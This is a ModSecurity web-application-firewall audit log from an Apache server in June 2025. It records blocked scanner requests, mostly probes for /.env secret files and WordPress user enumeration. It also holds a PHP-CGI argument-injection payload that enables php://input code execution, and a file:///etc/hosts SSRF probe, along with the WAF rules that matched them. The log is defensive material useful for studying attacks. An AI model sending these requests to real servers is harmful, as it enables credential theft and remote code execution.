Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --681d9051-Z-- --2e474d51-A-- [11/Jun/2025:05:44:54 +0700] aEi1ZhdyUEEur5MGa-VFZAAAAME 103.236.140.4 36100 103.236.140.4 8181 --2e474d51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 Accept-Charset: utf-8 --2e474d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e474d51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749595494906539 666 (- - -) Stopwatch2: 1749595494906539 666; combined=234, p1=205, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e474d51-Z-- --b755297e-A-- [11/Jun/2025:05:45:21 +0700] aEi1gWHSTY1pa5XXpU0nYAAAAEo 103.236.140.4 36110 103.236.140.4 8181 --b755297e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3722.400 QQBrowser/10.5.3763.400 Accept-Charset: utf-8 --b755297e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b755297e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749595521036158 947 (- - -) Stopwatch2: 1749595521036158 947; combined=390, p1=347, p2=0, p3=0, p4=0, p5=43, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b755297e-Z-- --2e81185b-A-- [11/Jun/2025:06:05:32 +0700] aEi6PJKj8lJYHQZ0EnfLHAAAAIk 103.236.140.4 36302 103.236.140.4 8181 --2e81185b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.200.24.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.200.24.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e81185b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e81185b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749596732856108 3751 (- - -) Stopwatch2: 1749596732856108 3751; combined=1450, p1=506, p2=906, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e81185b-Z-- --c824ce00-A-- [11/Jun/2025:06:31:24 +0700] aEjATBdyUEEur5MGa-VFiAAAANU 103.236.140.4 36576 103.236.140.4 8181 --c824ce00-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.88.170.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.88.170.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975U1 Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36 Accept-Charset: utf-8 --c824ce00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c824ce00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749598284211974 754 (- - -) Stopwatch2: 1749598284211974 754; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c824ce00-Z-- --c6d9293b-A-- [11/Jun/2025:06:31:27 +0700] aEjAT5Kj8lJYHQZ0EnfLJwAAAII 103.236.140.4 36578 103.236.140.4 8181 --c6d9293b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.88.170.48 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.88.170.48 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49 Accept-Charset: utf-8 --c6d9293b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6d9293b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749598287969296 829 (- - -) Stopwatch2: 1749598287969296 829; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6d9293b-Z-- --3a8e1c6b-A-- [11/Jun/2025:06:46:35 +0700] aEjD22HSTY1pa5XXpU0nvAAAAEY 103.236.140.4 36756 103.236.140.4 8181 --3a8e1c6b-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: iTunes/9.0.2 (Windows; N) Accept-Charset: utf-8 --3a8e1c6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a8e1c6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749599195992813 902 (- - -) Stopwatch2: 1749599195992813 902; combined=336, p1=294, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a8e1c6b-Z-- --553d665b-A-- [11/Jun/2025:06:49:07 +0700] aEjEc2HSTY1pa5XXpU0nygAAAEY 103.236.140.4 36806 103.236.140.4 8181 --553d665b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.234.217.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.234.217.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --553d665b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --553d665b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749599347024172 2706 (- - -) Stopwatch2: 1749599347024172 2706; combined=1205, p1=392, p2=785, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --553d665b-Z-- --4dc63037-A-- [11/Jun/2025:07:02:15 +0700] aEjHh5Kj8lJYHQZ0EnfLNgAAAII 103.236.140.4 36964 103.236.140.4 8181 --4dc63037-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --4dc63037-C-- --4dc63037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dc63037-E-- --4dc63037-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749600135056758 4742 (- - -) Stopwatch2: 1749600135056758 4742; combined=2961, p1=490, p2=2427, p3=0, p4=0, p5=44, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dc63037-Z-- --9fd54d5e-A-- [11/Jun/2025:07:39:23 +0700] aEjQO2HSTY1pa5XXpU0oTwAAAFc 103.236.140.4 37430 103.236.140.4 8181 --9fd54d5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.221.63.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.221.63.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9fd54d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fd54d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749602363768503 3134 (- - -) Stopwatch2: 1749602363768503 3134; combined=1297, p1=439, p2=828, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fd54d5e-Z-- --5658fb15-A-- [11/Jun/2025:08:02:29 +0700] aEjVpVZ8bXZTkbagOrDQEgAAAAk 103.236.140.4 37712 103.236.140.4 8181 --5658fb15-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.97.180.8 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --5658fb15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5658fb15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749603749749547 708 (- - -) Stopwatch2: 1749603749749547 708; combined=267, p1=231, p2=0, p3=0, p4=0, p5=35, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5658fb15-Z-- --56fcfd6b-A-- [11/Jun/2025:08:13:24 +0700] aEjYNGHSTY1pa5XXpU0ooQAAAFE 103.236.140.4 37812 103.236.140.4 8181 --56fcfd6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.79.247.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.79.247.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --56fcfd6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56fcfd6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749604404697043 3214 (- - -) Stopwatch2: 1749604404697043 3214; combined=1390, p1=514, p2=841, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56fcfd6b-Z-- --cd36c604-A-- [11/Jun/2025:08:27:35 +0700] aEjbh2HSTY1pa5XXpU0oyAAAAEc 103.236.140.4 37950 103.236.140.4 8181 --cd36c604-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.70.100.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd36c604-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd36c604-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749605255551973 3218 (- - -) Stopwatch2: 1749605255551973 3218; combined=1348, p1=472, p2=840, p3=0, p4=0, p5=36, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd36c604-Z-- --35b6017c-A-- [11/Jun/2025:08:56:53 +0700] aEjiZWHSTY1pa5XXpU0o5gAAAEs 103.236.140.4 38196 103.236.140.4 8181 --35b6017c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Accept-Charset: utf-8 --35b6017c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35b6017c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749607013058223 823 (- - -) Stopwatch2: 1749607013058223 823; combined=306, p1=261, p2=0, p3=0, p4=0, p5=45, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35b6017c-Z-- --0cdc0d26-A-- [11/Jun/2025:09:11:44 +0700] aEjl4JKj8lJYHQZ0EnfLeAAAAIU 103.236.140.4 38382 103.236.140.4 8181 --0cdc0d26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.143.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.143.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --0cdc0d26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cdc0d26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749607904829262 661 (- - -) Stopwatch2: 1749607904829262 661; combined=265, p1=234, p2=0, p3=0, p4=0, p5=31, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cdc0d26-Z-- --01ece463-A-- [11/Jun/2025:09:43:06 +0700] aEjtOmHSTY1pa5XXpU0plgAAAFU 103.236.140.4 39048 103.236.140.4 8181 --01ece463-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.81.24.74 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --01ece463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01ece463-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749609786341490 871 (- - -) Stopwatch2: 1749609786341490 871; combined=374, p1=339, p2=0, p3=0, p4=0, p5=35, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01ece463-Z-- --3f7f5667-A-- [11/Jun/2025:11:48:49 +0700] aEkKsZKj8lJYHQZ0EnfOdwAAAIw 103.236.140.4 43226 103.236.140.4 8181 --3f7f5667-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 155.94.155.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 155.94.155.19 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --3f7f5667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f7f5667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749617329908292 696 (- - -) Stopwatch2: 1749617329908292 696; combined=292, p1=259, p2=0, p3=0, p4=0, p5=33, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f7f5667-Z-- --f5f0ff4f-A-- [11/Jun/2025:11:48:53 +0700] aEkKtWHSTY1pa5XXpU0rUwAAAEs 103.236.140.4 43236 103.236.140.4 8181 --f5f0ff4f-B-- GET /api/geojson?url=file:///etc/hosts HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 155.94.155.19 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 155.94.155.19 X-Forwarded-Proto: http Connection: close User-Agent: l9explore/1.2.2 --f5f0ff4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5f0ff4f-E-- --f5f0ff4f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||103.236.140.4|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/geojson?url=file:///etc/hosts"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749617333450369 2422 (- - -) Stopwatch2: 1749617333450369 2422; combined=690, p1=500, p2=158, p3=0, p4=0, p5=31, sr=85, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5f0ff4f-Z-- --5f0bca04-A-- [11/Jun/2025:11:56:57 +0700] aEkMmVZ8bXZTkbagOrDRzAAAABc 103.236.140.4 43320 103.236.140.4 8181 --5f0bca04-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.11.224.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.11.224.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5f0bca04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f0bca04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749617817467636 3208 (- - -) Stopwatch2: 1749617817467636 3208; combined=1362, p1=484, p2=848, p3=0, p4=0, p5=30, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
